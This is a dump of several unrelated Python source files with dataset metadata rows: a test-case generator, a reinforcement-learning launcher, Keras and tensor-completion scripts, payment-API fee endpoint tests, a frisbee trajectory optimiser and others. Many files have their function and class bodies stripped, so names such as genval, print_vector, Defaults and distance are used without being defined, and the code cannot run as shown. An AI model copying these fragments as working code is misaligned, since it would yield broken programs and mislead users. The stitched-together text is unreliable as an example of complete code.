hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 11 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 251 | max_stars_repo_name stringlengths 4 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 251 | max_issues_repo_name stringlengths 4 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 251 | max_forks_repo_name stringlengths 4 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.05M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.04M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
fe440692a08637fae6bb18f0a67dbb7336fec900 | 1,909 | py | Python | gentable/gen_test_cases.py | selavy/studies | e17b91ffab193e46fec00cf2b8070dbf1f2c39e3 | [
"MIT"
] | null | null | null | gentable/gen_test_cases.py | selavy/studies | e17b91ffab193e46fec00cf2b8070dbf1f2c39e3 | [
"MIT"
] | null | null | null | gentable/gen_test_cases.py | selavy/studies | e17b91ffab193e46fec00cf2b8070dbf1f2c39e3 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import random
N = 32
M = 64
# NOTE: 0 is a reserved value
randu = lambda x: random.randint(1, 2**x-1)
randU32 = lambda: randu(32)
randU64 = lambda: randu(64)
fmt_by_dtype = {
'u32hex': '0x{:08x}',
'u64hex': '0x{:016x}',
}
cpp_by_dtype = {
'u32hex': 'uint32_t',
'u64hex': 'uint64_t',
}
# key = randU32()
# vals = [(key, randU32(), randU64()) for _ in range(N)]
# keys = [(x[0], x[1]) for x in vals]
# success = [random.choice(vals) for _ in range(M)]
# failure = []
keys = [(randU32(),) for _ in range(M)]
vals = [(randU32(), randU64()) for _ in range(N)]
miss = [(genval(),) for _ in range(M)]
print('TEST_CASE("Insert random values and look them up", "[gentbl]")')
print('{')
print_vector(keys, name='keys', dtypes=['u32hex'], indent=4)
print()
print_vector(vals, name='vals', dtypes=['u32hex', 'u64hex'], indent=4)
print()
print_vector(miss, name='miss', dtypes=['u32hex'], indent=4)
print()
print('}')
# print("const std::vector<std::tuple<uint32_t, uint32_t, uint64_t>> vs = {")
# for _ in range(N):
# print(" {{ 0x{:08x}, 0x{:08x}, 0x{:016x} }},".format(
# randU32(), randU32(), randU64()))
# print("};")
| 24.474359 | 83 | 0.572027 |
fe449c44aa57e39f59499c7b75ef20b3e5b78b64 | 6,143 | py | Python | examples/toy_env/run_toy_env.py | aaspeel/deer | 3ced3695f0ca8537337019d2e3ec0ff8bd346d91 | [
"BSD-3-Clause"
] | null | null | null | examples/toy_env/run_toy_env.py | aaspeel/deer | 3ced3695f0ca8537337019d2e3ec0ff8bd346d91 | [
"BSD-3-Clause"
] | null | null | null | examples/toy_env/run_toy_env.py | aaspeel/deer | 3ced3695f0ca8537337019d2e3ec0ff8bd346d91 | [
"BSD-3-Clause"
] | null | null | null | """Toy environment launcher. See the docs for more details about this environment.
"""
import sys
import logging
import numpy as np
from deer.default_parser import process_args
from deer.agent import NeuralAgent
from deer.learning_algos.q_net_keras import MyQNetwork
from Toy_env import MyEnv as Toy_env
import deer.experiment.base_controllers as bc
from deer.policies import EpsilonGreedyPolicy
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
# --- Parse parameters ---
parameters = process_args(sys.argv[1:], Defaults)
if parameters.deterministic:
rng = np.random.RandomState(123456)
else:
rng = np.random.RandomState()
# --- Instantiate environment ---
env = Toy_env(rng)
# --- Instantiate qnetwork ---
qnetwork = MyQNetwork(
env,
parameters.rms_decay,
parameters.rms_epsilon,
parameters.momentum,
parameters.clip_norm,
parameters.freeze_interval,
parameters.batch_size,
parameters.update_rule,
rng)
train_policy = EpsilonGreedyPolicy(qnetwork, env.nActions(), rng, 0.1)
test_policy = EpsilonGreedyPolicy(qnetwork, env.nActions(), rng, 0.)
# --- Instantiate agent ---
agent = NeuralAgent(
env,
qnetwork,
parameters.replay_memory_size,
max(env.inputDimensions()[i][0] for i in range(len(env.inputDimensions()))),
parameters.batch_size,
rng,
train_policy=train_policy,
test_policy=test_policy)
# --- Bind controllers to the agent ---
# Before every training epoch (periodicity=1), we want to print a summary of the agent's epsilon, discount and
# learning rate as well as the training epoch number.
agent.attach(bc.VerboseController(
evaluate_on='epoch',
periodicity=1))
# During training epochs, we want to train the agent after every [parameters.update_frequency] action it takes.
# Plus, we also want to display after each training episode (!= than after every training) the average bellman
# residual and the average of the V values obtained during the last episode, hence the two last arguments.
agent.attach(bc.TrainerController(
evaluate_on='action',
periodicity=parameters.update_frequency,
show_episode_avg_V_value=True,
show_avg_Bellman_residual=True))
# Every epoch end, one has the possibility to modify the learning rate using a LearningRateController. Here we
# wish to update the learning rate after every training epoch (periodicity=1), according to the parameters given.
agent.attach(bc.LearningRateController(
initial_learning_rate=parameters.learning_rate,
learning_rate_decay=parameters.learning_rate_decay,
periodicity=1))
# Same for the discount factor.
agent.attach(bc.DiscountFactorController(
initial_discount_factor=parameters.discount,
discount_factor_growth=parameters.discount_inc,
discount_factor_max=parameters.discount_max,
periodicity=1))
# As for the discount factor and the learning rate, one can update periodically the parameter of the epsilon-greedy
# policy implemented by the agent. This controllers has a bit more capabilities, as it allows one to choose more
# precisely when to update epsilon: after every X action, episode or epoch. This parameter can also be reset every
# episode or epoch (or never, hence the resetEvery='none').
agent.attach(bc.EpsilonController(
initial_e=parameters.epsilon_start,
e_decays=parameters.epsilon_decay,
e_min=parameters.epsilon_min,
evaluate_on='action',
periodicity=1,
reset_every='none'))
# All previous controllers control the agent during the epochs it goes through. However, we want to interleave a
# "test epoch" between each training epoch ("one of two epochs", hence the periodicity=2). We do not want these
# test epoch to interfere with the training of the agent, which is well established by the TrainerController,
# EpsilonController and alike. Therefore, we will disable these controllers for the whole duration of the test
# epochs interleaved this way, using the controllersToDisable argument of the InterleavedTestEpochController.
# The value of this argument is a list of the indexes of all controllers to disable, their index reflecting in
# which order they were added. Here, "0" is refering to the firstly attached controller, thus the
# VerboseController; "2" refers to the thirdly attached controller, thus the LearningRateController; etc. The order
# in which the indexes are listed is not important.
# For each test epoch, we want also to display the sum of all rewards obtained, hence the showScore=True.
# Finally, we want to call the summarizePerformance method of Toy_Env every [parameters.period_btw_summary_perfs]
# *test* epochs.
agent.attach(bc.InterleavedTestEpochController(
id=0,
epoch_length=parameters.steps_per_test,
periodicity=1,
show_score=True,
summarize_every=parameters.period_btw_summary_perfs))
# --- Run the experiment ---
agent.run(parameters.epochs, parameters.steps_per_epoch)
| 39.378205 | 120 | 0.689891 |
fe44a3208c6d0b6455e3244b9bf2ee35ca9096e2 | 626 | py | Python | equilibration/sodium_models/seed_1/post_processing/rdf_calculations.py | Dynamical-Systems-Laboratory/IPMCsMD | 7f0662568d37dce7dcd07b648284aa62991d343c | [
"MIT"
] | 2 | 2020-10-30T16:17:01.000Z | 2021-08-23T13:58:03.000Z | equilibration/sodium_models/seed_9/post_processing/rdf_calculations.py | atruszkowska/IPMCsMD | d3900ea4da453bcc037fd946a2ae61cc67e316f5 | [
"MIT"
] | null | null | null | equilibration/sodium_models/seed_9/post_processing/rdf_calculations.py | atruszkowska/IPMCsMD | d3900ea4da453bcc037fd946a2ae61cc67e316f5 | [
"MIT"
] | 3 | 2020-09-14T20:42:47.000Z | 2021-12-13T07:58:16.000Z | # ------------------------------------------------------------------
#
# RDF and CN related analysis
#
# ------------------------------------------------------------------
import sys
py_path = '../../../../postprocessing/'
sys.path.insert(0, py_path)
py_path = '../../../../postprocessing/io_operations/'
sys.path.insert(0, py_path)
import cn_and_rdf_lmp as crl
import io_module as io
#
# Input
#
# RDF and CN intput file
rdf_file = '../nafion.rdf'
# Output file
out_file = 'rdf_cn_averaged.txt'
# Number of bins
nbins = 300
# Number of columns
ncols = 10
crl.compute_time_average(rdf_file, out_file, nbins, ncols)
| 17.885714 | 68 | 0.543131 |
fe463c850bc48b7b739387d099ca1d849b457791 | 1,675 | py | Python | venv/Lib/site-packages/plotnine/geoms/geom_pointrange.py | EkremBayar/bayar | aad1a32044da671d0b4f11908416044753360b39 | [
"MIT"
] | null | null | null | venv/Lib/site-packages/plotnine/geoms/geom_pointrange.py | EkremBayar/bayar | aad1a32044da671d0b4f11908416044753360b39 | [
"MIT"
] | 1 | 2020-10-02T21:43:06.000Z | 2020-10-15T22:52:39.000Z | venv/Lib/site-packages/plotnine/geoms/geom_pointrange.py | EkremBayar/bayar | aad1a32044da671d0b4f11908416044753360b39 | [
"MIT"
] | null | null | null | from ..doctools import document
from .geom import geom
from .geom_path import geom_path
from .geom_point import geom_point
from .geom_linerange import geom_linerange
| 29.385965 | 70 | 0.577313 |
fe468cffe0b2fb47619682741847648e0145af63 | 3,704 | py | Python | app/backend-test/core_models/keras-experiments/run02_try_simple_CNN_generate.py | SummaLabs/DLS | 2adba47430b456ad0f324e4c8883a896a23b3fbf | [
"MIT"
] | 32 | 2017-09-04T17:40:39.000Z | 2021-02-16T23:08:34.000Z | app/backend-test/core_models/keras-experiments/run02_try_simple_CNN_generate.py | AymanNabih/DLS | 2adba47430b456ad0f324e4c8883a896a23b3fbf | [
"MIT"
] | 3 | 2017-10-09T12:52:54.000Z | 2020-06-29T02:48:38.000Z | app/backend-test/core_models/keras-experiments/run02_try_simple_CNN_generate.py | AymanNabih/DLS | 2adba47430b456ad0f324e4c8883a896a23b3fbf | [
"MIT"
] | 20 | 2017-10-07T17:29:50.000Z | 2021-01-23T22:01:54.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
__author__ = 'ar'
import json
import os
import skimage.io as skio
import matplotlib.pyplot as plt
import numpy as np
import keras
from keras.models import Model
from keras.layers import Input, Convolution2D, MaxPooling2D, Flatten, Dense
from keras.utils.visualize_util import plot as kplot
##################################
##################################
##################################
if __name__ == '__main__':
model = buildModelCNN(inpShape=(3, 128, 128))
fimgModel = 'keras-model-cnn.jpg'
kplot(model, fimgModel, show_shapes=True)
# plt.imshow(skio.imread(fimgModel))
# plt.show()
model.summary()
print ('------')
numLayers = len(model.layers)
for ii,ll in enumerate(model.layers):
print ('[%d/%d] : %s' % (ii, numLayers, ll))
modelJson = generateModelJsonDict(model)
print ('----------------------')
print (json.dumps(modelJson, indent=4))
foutJson = 'test-model-cnn.json'
with open(foutJson, 'w') as f:
json.dump(modelJson, f, indent=4)
# print (json.dumps(modelJson, indent=4))
| 31.389831 | 108 | 0.551026 |
fe4725d5ecf06c13eb1ec7a97c57345acb7badcb | 760 | py | Python | tests/integration/test_interface.py | Synodic-Software/CPPython | 12e9acdf68e54d45bcf0b6c137d4fe627d1f6877 | [
"MIT"
] | null | null | null | tests/integration/test_interface.py | Synodic-Software/CPPython | 12e9acdf68e54d45bcf0b6c137d4fe627d1f6877 | [
"MIT"
] | 8 | 2021-11-28T23:46:36.000Z | 2022-03-15T09:00:43.000Z | tests/integration/test_interface.py | Synodic-Software/CPPython | 12e9acdf68e54d45bcf0b6c137d4fe627d1f6877 | [
"MIT"
] | 2 | 2021-11-28T23:17:49.000Z | 2021-11-28T23:36:03.000Z | """
Test the integrations related to the internal interface implementation and the 'Interface' interface itself
"""
import pytest
from cppython_core.schema import InterfaceConfiguration
from pytest_cppython.plugin import InterfaceIntegrationTests
from cppython.console import ConsoleInterface
| 28.148148 | 107 | 0.735526 |
fe4908b1c0b067e1655d4c242e84ebb2602b1af5 | 11,218 | py | Python | src/main.py | srijankr/DAIN | 89edec24e63383dfd5ef19f2bfb48d11b75b3dde | [
"Apache-2.0"
] | 3 | 2021-08-19T20:11:45.000Z | 2021-08-23T14:20:11.000Z | src/main.py | srijankr/DAIN | 89edec24e63383dfd5ef19f2bfb48d11b75b3dde | [
"Apache-2.0"
] | null | null | null | src/main.py | srijankr/DAIN | 89edec24e63383dfd5ef19f2bfb48d11b75b3dde | [
"Apache-2.0"
] | null | null | null | #@contact Sejoon Oh (soh337@gatech.edu), Georgia Institute of Technology
#@version 1.0
#@date 2021-08-17
#Influence-guided Data Augmentation for Neural Tensor Completion (DAIN)
#This software is free of charge under research purposes.
#For commercial purposes, please contact the main author.
import torch
from torch import nn
from torch.utils.data import Dataset, DataLoader
import argparse
import numpy as np
from dataset import TensorDataset
import torch.optim as optim
from model import MLP
import pandas as pd
import copy
import random
from sklearn.model_selection import train_test_split
import os
if __name__ == "__main__":
main()
| 45.97541 | 201 | 0.668123 |
fe4a3921bc3a55c6c61a10f07f322ae6a1bc443a | 12,719 | py | Python | pay-api/tests/unit/api/test_fee.py | saravanpa-aot/sbc-pay | fb9f61b99e506e43280bc69531ee107cc12cd92d | [
"Apache-2.0"
] | null | null | null | pay-api/tests/unit/api/test_fee.py | saravanpa-aot/sbc-pay | fb9f61b99e506e43280bc69531ee107cc12cd92d | [
"Apache-2.0"
] | null | null | null | pay-api/tests/unit/api/test_fee.py | saravanpa-aot/sbc-pay | fb9f61b99e506e43280bc69531ee107cc12cd92d | [
"Apache-2.0"
] | 5 | 2019-03-01T01:12:12.000Z | 2019-07-08T16:33:47.000Z | # Copyright 2019 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests to assure the fees end-point.
Test-Suite to ensure that the /fees endpoint is working as expected.
"""
import json
from datetime import date, timedelta
from pay_api.models import CorpType, FeeCode, FeeSchedule, FilingType
from pay_api.schemas import utils as schema_utils
from pay_api.utils.enums import Role
from tests.utilities.base_test import get_claims, get_gov_account_payload, token_header
def test_fees_with_corp_type_and_filing_type(session, client, jwt, app):
"""Assert that the endpoint returns 200."""
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 100))
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
def test_fees_with_corp_type_and_filing_type_with_valid_start_date(session, client, jwt, app):
"""Assert that the endpoint returns 200."""
# Insert a record first and then query for it
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
now = date.today()
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 100),
now - timedelta(1))
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?valid_date={now}', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
assert not schema_utils.validate(rv.json, 'problem')[0]
def test_fees_with_corp_type_and_filing_type_with_invalid_start_date(session, client, jwt, app):
"""Assert that the endpoint returns 400."""
# Insert a record first and then query for it
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
now = date.today()
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 100),
now + timedelta(1))
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?valid_date={now}', headers=headers)
assert rv.status_code == 400
assert schema_utils.validate(rv.json, 'problem')[0]
assert not schema_utils.validate(rv.json, 'fees')[0]
def test_fees_with_corp_type_and_filing_type_with_valid_end_date(session, client, jwt, app):
"""Assert that the endpoint returns 200."""
# Insert a record first and then query for it
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
now = date.today()
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 100),
now - timedelta(1),
now)
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?valid_date={now}', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
def test_fees_with_corp_type_and_filing_type_with_invalid_end_date(session, client, jwt, app):
"""Assert that the endpoint returns 400."""
# Insert a record first and then query for it
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
now = date.today()
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 100),
now - timedelta(2),
now - timedelta(1))
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?valid_date={now}', headers=headers)
assert rv.status_code == 400
assert schema_utils.validate(rv.json, 'problem')[0]
def test_calculate_fees_with_waive_fees(session, client, jwt, app):
"""Assert that the endpoint returns 201."""
token = jwt.create_jwt(get_claims(role='staff'), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 100))
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?waiveFees=true', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
assert rv.json.get('filingFees') == 0
def test_calculate_fees_with_waive_fees_unauthorized(session, client, jwt, app):
"""Assert that the endpoint returns 201."""
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 100))
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?waiveFees=true', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
assert rv.json.get('filingFees') == 100
def test_fees_with_quantity(session, client, jwt, app):
"""Assert that the endpoint returns 200."""
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 100))
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}?quantity=10', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
def test_calculate_fees_for_service_fee(session, client, jwt, app):
"""Assert that the endpoint returns 201."""
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
service_fee = factory_fee_model('SF01', 1.5)
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 100),
service_fee=service_fee)
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
assert rv.json.get('filingFees') == 100
assert rv.json.get('serviceFees') == 1.5
def test_calculate_fees_with_zero_service_fee(session, client, jwt, app):
"""Assert that service fee is zero if the filing fee is zero."""
token = jwt.create_jwt(get_claims(), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
corp_type = 'XX'
filing_type_code = 'XOTANN'
factory_fee_schedule_model(
factory_filing_type_model('XOTANN', 'TEST'),
factory_corp_type_model('XX', 'TEST'),
factory_fee_model('XXX', 0))
rv = client.get(f'/api/v1/fees/{corp_type}/{filing_type_code}', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
assert rv.json.get('filingFees') == 0
assert rv.json.get('serviceFees') == 0
def test_fee_for_account_fee_settings(session, client, jwt, app):
"""Assert that the endpoint returns 200."""
token = jwt.create_jwt(get_claims(role=Role.SYSTEM.value), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
rv = client.post('/api/v1/accounts', data=json.dumps(get_gov_account_payload()),
headers=headers)
account_id = rv.json.get('authAccountId')
# Create account fee details.
token = jwt.create_jwt(get_claims(role=Role.MANAGE_ACCOUNTS.value), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
client.post(f'/api/v1/accounts/{account_id}/fees', data=json.dumps({'accountFees': [
{
'applyFilingFees': False,
'serviceFeeCode': 'TRF02', # 1.0
'product': 'BUSINESS'
}
]}), headers=headers)
# Get fee for this account.
token = jwt.create_jwt(get_claims(role=Role.EDITOR.value), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json', 'Account-Id': account_id}
rv = client.get('/api/v1/fees/BEN/BCANN', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
# assert filing fee is not applied and service fee is applied
assert rv.json.get('filingFees') == 0
assert rv.json.get('serviceFees') == 1.0
# Now change the settings to apply filing fees and assert
token = jwt.create_jwt(get_claims(role=Role.MANAGE_ACCOUNTS.value), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json'}
client.put(f'/api/v1/accounts/{account_id}/fees/BUSINESS', data=json.dumps({
'applyFilingFees': True,
'serviceFeeCode': 'TRF01', # 1.5
'product': 'BUSINESS'
}), headers=headers)
# Get fee for this account.
token = jwt.create_jwt(get_claims(role=Role.EDITOR.value), token_header)
headers = {'Authorization': f'Bearer {token}', 'content-type': 'application/json', 'Account-Id': account_id}
rv = client.get('/api/v1/fees/BEN/BCANN', headers=headers)
assert rv.status_code == 200
assert schema_utils.validate(rv.json, 'fees')[0]
# assert filing fee is applied and service fee is applied
assert rv.json.get('filingFees') > 0
assert rv.json.get('serviceFees') == 1.5
def factory_filing_type_model(
filing_type_code: str,
filing_description: str = 'TEST'):
"""Return the filing type model."""
filing_type = FilingType(code=filing_type_code,
description=filing_description)
filing_type.save()
return filing_type
def factory_fee_model(
fee_code: str,
amount: int):
"""Return the fee code model."""
fee_code_master = FeeCode(code=fee_code,
amount=amount)
fee_code_master.save()
return fee_code_master
def factory_corp_type_model(
corp_type_code: str,
corp_type_description: str):
"""Return the corp type model."""
corp_type = CorpType(code=corp_type_code,
description=corp_type_description)
corp_type.save()
return corp_type
def factory_fee_schedule_model(
filing_type: FilingType,
corp_type: CorpType,
fee_code: FeeCode,
fee_start_date: date = date.today(),
fee_end_date: date = None,
service_fee: FeeCode = None):
"""Return the fee schedule model."""
fee_schedule = FeeSchedule(filing_type_code=filing_type.code,
corp_type_code=corp_type.code,
fee_code=fee_code.code,
fee_start_date=fee_start_date,
fee_end_date=fee_end_date
)
if service_fee:
fee_schedule.service_fee_code = service_fee.code
fee_schedule.save()
return fee_schedule
| 41.029032 | 112 | 0.679928 |
fe4b1dcb47180e465318d2ca261b6bc60c83e970 | 1,933 | py | Python | backend/app/auth/service.py | pers0n4/yoonyaho | cf7518667bc7cefff0f9534a5e0af89b261cfed7 | [
"MIT"
] | null | null | null | backend/app/auth/service.py | pers0n4/yoonyaho | cf7518667bc7cefff0f9534a5e0af89b261cfed7 | [
"MIT"
] | 16 | 2021-04-04T10:58:24.000Z | 2021-05-23T11:52:08.000Z | backend/app/auth/service.py | pers0n4/yoonyaho | cf7518667bc7cefff0f9534a5e0af89b261cfed7 | [
"MIT"
] | null | null | null | from datetime import datetime, timedelta
import jwt
from flask import current_app
from app import db
from app.user.repository import UserRepository
| 30.203125 | 88 | 0.558717 |
fe4c72b51d2a6fb97aa207f15cdf6884d9d32013 | 4,843 | py | Python | scripts/qlearn.py | kebaek/minigrid | 3808c1401ea7846febf88d0a2fb2aa39e4a4913f | [
"MIT"
] | 5 | 2021-09-29T18:53:37.000Z | 2022-03-01T08:03:42.000Z | scripts/qlearn.py | kebaek/minigrid | 3808c1401ea7846febf88d0a2fb2aa39e4a4913f | [
"MIT"
] | null | null | null | scripts/qlearn.py | kebaek/minigrid | 3808c1401ea7846febf88d0a2fb2aa39e4a4913f | [
"MIT"
] | null | null | null | import _init_paths
import argparse
import random
import time
import utils
import os
from collections import defaultdict
import numpy as np
import csv
from progress.bar import IncrementalBar
from utils.hash import *
if __name__ == '__main__':
main()
| 38.133858 | 175 | 0.628536 |
fe4cffed78f06b24cc3c09215a327c208310e601 | 1,634 | py | Python | research/tunnel.py | carrino/FrisPy | db9e59f465ee25d1c037d580c37da8f35b930b50 | [
"MIT"
] | null | null | null | research/tunnel.py | carrino/FrisPy | db9e59f465ee25d1c037d580c37da8f35b930b50 | [
"MIT"
] | null | null | null | research/tunnel.py | carrino/FrisPy | db9e59f465ee25d1c037d580c37da8f35b930b50 | [
"MIT"
] | null | null | null | import math
from pprint import pprint
import matplotlib.pyplot as plt
from scipy.optimize import minimize
from frispy import Disc
from frispy import Discs
from frispy import Model
model = Discs.roc
mph_to_mps = 0.44704
v = 56 * mph_to_mps
rot = -v / model.diameter
ceiling = 4 # 4 meter ceiling
tunnel_width = 4 # 4 meter wide tunnel
bnds = [(-90, 90)] * 3
x0 = [6, -3, 10]
res = minimize(distance, x0, method='powell', bounds=bnds, options={'xtol': 1e-8, 'disp': True})
pprint(res)
a, nose_up, hyzer = res.x
disc = Disc(model, {"vx": math.cos(a * math.pi / 180) * v, "dgamma": rot, "vz": math.sin(a * math.pi / 180) * v,
"nose_up": nose_up, "hyzer": hyzer})
result = disc.compute_trajectory(15.0, **{"max_step": .2})
times = result.times
t, x, y, z = result.times, result.x, result.y, result.z
#plt.plot(x, y)
#plt.plot(x, z)
#plt.plot(t, x)
plt.plot(t, y)
plt.plot(t, z)
pprint(x[-1] * 3.28084) # feet
plt.show()
| 27.694915 | 113 | 0.621787 |
fe4e0e23c7947f7d713c88797190743b2b4ea285 | 1,450 | py | Python | openfermioncirq/variational/ansatzes/swap_network_trotter_hubbard_test.py | unpilbaek/OpenFermion-Cirq | d2f5a871bb5aea1e53d280c0a0e4be999b0c8d9d | [
"Apache-2.0"
] | 278 | 2018-07-18T23:43:16.000Z | 2022-01-02T21:38:08.000Z | openfermioncirq/variational/ansatzes/swap_network_trotter_hubbard_test.py | unpilbaek/OpenFermion-Cirq | d2f5a871bb5aea1e53d280c0a0e4be999b0c8d9d | [
"Apache-2.0"
] | 131 | 2018-07-18T19:04:58.000Z | 2020-08-04T21:05:42.000Z | openfermioncirq/variational/ansatzes/swap_network_trotter_hubbard_test.py | unpilbaek/OpenFermion-Cirq | d2f5a871bb5aea1e53d280c0a0e4be999b0c8d9d | [
"Apache-2.0"
] | 101 | 2018-07-18T21:43:50.000Z | 2022-03-04T09:51:02.000Z | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from openfermioncirq.variational.ansatzes import SwapNetworkTrotterHubbardAnsatz
| 41.428571 | 80 | 0.65931 |
fe4e2e11b7395e1b93b6ba3044a09072e2e8f08b | 1,230 | py | Python | Modules/Phylogenetic.py | DaneshMoradigaravand/PlasmidPerm | 7a84c1d4dbf7320dd5ba821ff0e715a89fe4b3e4 | [
"MIT"
] | null | null | null | Modules/Phylogenetic.py | DaneshMoradigaravand/PlasmidPerm | 7a84c1d4dbf7320dd5ba821ff0e715a89fe4b3e4 | [
"MIT"
] | null | null | null | Modules/Phylogenetic.py | DaneshMoradigaravand/PlasmidPerm | 7a84c1d4dbf7320dd5ba821ff0e715a89fe4b3e4 | [
"MIT"
] | null | null | null | import os
from Bio import AlignIO, Phylo
from Bio.Phylo.TreeConstruction import DistanceCalculator, DistanceTreeConstructor | 45.555556 | 102 | 0.71626 |
fe50481354faa15f773f5ba3bf0a4fb0f0ded16b | 8,854 | py | Python | retrieve_regmod_values.py | cbcommunity/cbapi-examples | f8a81006b27c724582b4b04c124eb97a8c8e75d3 | [
"MIT"
] | 17 | 2016-07-21T14:58:49.000Z | 2020-10-26T15:51:38.000Z | retrieve_regmod_values.py | cbcommunity/cbapi-examples | f8a81006b27c724582b4b04c124eb97a8c8e75d3 | [
"MIT"
] | 5 | 2017-06-07T02:42:09.000Z | 2019-10-23T12:26:29.000Z | retrieve_regmod_values.py | cbcommunity/cbapi-examples | f8a81006b27c724582b4b04c124eb97a8c8e75d3 | [
"MIT"
] | 9 | 2016-10-03T02:18:23.000Z | 2021-03-08T22:44:33.000Z | #!/usr/bin/env python
#
